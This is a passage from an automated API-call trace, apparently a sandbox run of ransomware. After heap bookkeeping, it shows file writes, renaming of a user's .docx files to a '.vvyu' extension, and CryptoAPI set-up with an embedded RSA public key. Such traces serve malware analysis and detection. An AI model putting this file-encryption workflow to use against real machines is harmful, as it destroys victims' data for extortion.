Flags=0x0, Size=0x40) returned 0x2ae29b0 [0189.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da00 [0189.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae29f8 [0189.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da18 [0189.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da48 [0189.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daa8 [0189.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da60 [0189.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.004] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0189.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0189.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0189.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0189.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0189.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daa8 [0189.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0189.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da60 [0189.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0da48 [0189.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0189.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0189.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0189.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0189.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0189.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0189.008] GetCurrentThreadId () returned 0x5d8 [0189.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0189.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae3f48 [0189.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0189.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.009] GetCurrentThreadId () returned 0x5d8 [0189.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40160 [0189.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daa8 [0189.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da48 [0189.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0189.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da60 [0189.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da30 [0189.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dac0 [0189.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0189.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da90 [0189.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da78 [0189.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dad8 [0189.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0189.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da78 [0189.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0189.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0189.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0189.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da48 [0189.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0189.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0189.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0189.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0189.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0189.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0189.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0189.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0189.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0189.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0189.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0189.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0189.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0189.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae29f8 | out: hHeap=0x2c0000) returned 1 [0189.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0189.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.019] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xc770, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xc770, lpOverlapped=0x0) returned 1 [0189.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0189.020] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc775, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.021] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0189.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0189.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0189.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.023] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0189.023] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.023] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.023] CloseHandle (hObject=0x584) returned 1 [0189.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af1f88 [0189.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.026] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\a_eeMub.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\a_eemub.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\a_eeMub.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\a_eemub.docx.vvyu")) returned 1 [0189.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.028] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.032] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7519b550, ftCreationTime.dwHighDateTime=0x1d88dd1, ftLastAccessTime.dwLowDateTime=0x7104f2e0, ftLastAccessTime.dwHighDateTime=0x1d89b23, ftLastWriteTime.dwLowDateTime=0x7104f2e0, ftLastWriteTime.dwHighDateTime=0x1d89b23, nFileSizeHigh=0x0, nFileSizeLow=0xf055, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bDmsvG.docx", cAlternateFileName="BDMSVG~1.DOC")) returned 1 [0189.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae29f8 [0189.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae29f8 | out: hHeap=0x2c0000) returned 1 [0189.032] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\bDmsvG.docx") returned=".docx" [0189.032] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\bDmsvG.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\bdmsvg.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.034] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=61525) returned 1 [0189.034] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.037] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xf02f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.037] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.039] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.039] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xf055, lpOverlapped=0x0) returned 1 [0189.040] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.040] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.040] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.040] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.041] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.041] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) 